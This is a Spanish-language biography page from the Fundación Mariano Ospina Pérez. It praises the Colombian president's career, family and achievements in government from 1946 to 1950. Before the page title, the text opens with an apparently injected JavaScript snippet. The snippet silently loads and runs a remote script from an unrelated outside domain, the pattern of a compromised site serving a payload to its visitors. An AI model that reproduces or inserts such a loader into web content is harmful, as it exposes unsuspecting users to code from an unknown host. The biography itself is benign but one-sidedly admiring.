;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mariano Ospina Pérez – Fundación Mariano Ospina Perez Skip to content

MARIANO OSPINA PÉREZ

Mariano Ospina Pérez

(1891-1976)

El ingeniero Mariano Ospina Pérez  llega en 1946 a la presidencia, con una gran experiencia de servicio al país: Superintendente del Ferrocarril de Antioquia; como senador fue el inspirador y ponente de la Ley que creó la Caja de Crédito Agrario Industrial y Minero; ministro de Obras Públicas y gerente fundador de la Federación Nacional de Cafeteros.
Nada extraño, entonces, que la suya fuera una gestión brillante: inició su presidencia con medidas eficaces para controlar la inflación; se ocupó de la organización electoral para la prevención del fraude; su política de sustitución de importaciones fomentó el crecimiento de la industria nacional, que durante su mandato creció un 46 %; emprendió una lucha frontal contra el alcoholismo; estableció el Instituto Colombiano de los Seguros Sociales y expidió el Código del Trabajo; dio impulso a la telefonía, que se incrementó en 71 %; acometió grandes proyectos de irrigación en los valles del Coello y el Saldaña; creó el Instituto Nacional de Aprovechamiento de Aguas y Fomento Eléctrico, la Siderúrgica de Paz del Río y Ecopetrol; fundó el ICETEX. Se preocupó especialmente por mejorar la suerte del campesinado colombiano.  El suyo fue el primer gobierno que se actuó con criterios ecológicos, delimitando la Reserva de la Macarena como primer parque natural protegido, entre muchas realizaciones.
El aterrador invierno de 1949 destruyó prácticamente la pequeña red vial, primitiva y mal sostenida. El presidente Ospina acudió al Banco Mundial y logró el envío de una misión técnica, encabezada por Lauchlin Currie, que trazó el primer plan completo y coherente para la reconstrucción vial y el desarrollo de la infraestructura de transporte ferroviario, fluvial y marítimo, que pondrían en práctica los gobiernos que a partir de agosto de 1950 lo sucedieron.
Su gobierno tuvo que afrontar dos calamidades, una política y otra física: Con el asesinato de Jorge Eliécer Gaitán, el 9 de abril de 1948, se encendió la chispa revolucionaria, que estuvo a punto de alcanzar el poder, pero su valentía, serenidad y energía permitieron debelar el complot y preservar las instituciones. Su actuación en esas trágicas horas se resume en su frase “Para la democracia colombiana vale más un presidente muerto que uno fugitivo”.
Su excepcional obra de gobierno lo convirtió en jefe natural del conservatismo colombiano, hasta su muerte en 1976. Como líder político, Mariano Ospina Pérez tendrá especial significación dentro de la organización y gobierno del Frente Nacional (1958-1972) y los que lo continuaron, hasta 1982, de responsabilidad compartida de los dos grandes partidos. Esta época ha sido la de mayor paz, prosperidad y progreso económico y social que ha tenido el país.

 José Alvear Sanín

Galería de Fotos

Ver más

Videos

Ver más

Publicaciones

Ver más

Vida y Obra

Nació en Medellín el 24 de noviembre de 1891 y falleció en Bogotá el 14 de abril de 1976.

Fue el segundo de los 10 hijos del ingeniero Tulio Ospina Vásquez y su esposa Ana Rosa Clara Pérez Puerta (el mayor de los hombres; sus hermanos fueron Mercedes, Sofía, Gabriela, Rafael, Margarita, Tulio, Francisco, Jorge y Ester Ospina Pérez). Perteneció a una familia muy importante en la política nacional, en la que hubo otros dos presidentes de Colombia: su abuelo paterno Mariano Ospina Rodríguez y su tío Pedro Nel Ospina Vásquez.
Estudió bachillerato en el Colegio San Ignacio de Loyola, en Medellín y, más tarde, se graduó como ingeniero civil y de minas en la Escuela de Minas de Medellín, Antioquia, en 1914.

Viajó por el exterior (Estados Unidos, Inglaterra, Bélgica y Francia), hizo sus estudios de posgrado en la Universidad de Luisiana, Estados Unidos, y en la Universidad de Lovaina, Bélgica. donde realizó cursos sobre producción de azúcar, economía, relaciones laborales, cooperativismo, producción minera y ferrocarriles.

Siendo muy joven inició su carrera política como Concejal de Medellín y diputado de la Asamblea de Antioquia y su carrera administrativa como superintendente del Ferrocarril de Antioquia, la empresa de mayor envergadura de Colombia en esa época.

Sus numerosas actividades privadas se orientaron hacia proyectos de minería de oro, ganadería y desarrollos urbanísticos.

Fue rector de la Escuela de Minas de Medellín, Presidente de la Sociedad Colombiana de Ingenieros, Representante a la Cámara, Senador de la República y Ministro de Obras Públicas del Presidente Miguel Abadía Méndez.

Ospina Pérez tiene el mérito especial de haber sido organizador, planificador y estratega de la industria cafetera, la cual hizo posible la base económica del desarrollo nacional a mediados del siglo pasado.

El 26 de julio de 1926, contrajo matrimonio en Medellín con Bertha Hernández ,hija del destacado empresario Antonio María Hernández Suárez y de Mercedes Fernández Echavarría Tuvieron cinco hijos: Mariano, Rodrigo; Fernando ; Gonzalo y María Clara.

Fue presidente de la República de 1946 a 1950.

Principales Realizaciones

  • Caja de Crédito Agrario
  • Ministerio de Higiene
  • Ministerio de
  • Agricultura y Ganadería
  • Instituto Nacional de Nutrición
  • Instituto Colombiano de Seguros Sociales
  • Instituto Nacional de Aprovechamiento de Aguas y Fomento Eléctrico
  • Instituto de Fomento Algodonero
  • Instituto de Parcelaciones, Colonización y Defensa Forestal
  • Instituto Nacional de Abastecimientos
  • Instituto de Estudios en el Exterior (Icetex)
  • Telecom
  • Represas del Sisga y del Neusa
  • Irrigaciones de los ríos Saldaña y Coello
  • Consejo Nacional de Petroleros
  • Empresa Siderúrgica de Paz del Río
  • Paz del Río
  • Policía Militar y Policía Rural
  • Dirección Nacional y Aeronáutica Civil
  • UTC (Unión de Trabajadores de Colombia)
  • Código Sustantivo y Procesal del Trabajo

Además, organizó la Federación Nacional de Cafeteros de Colombia; construyó el puerto de Tumaco y múltiples obras portuarias. Impulsó carreteras y ferrocarriles. Concertó el Primer Plan Nacional de Desarrollo, con apoyo del Banco Mundial.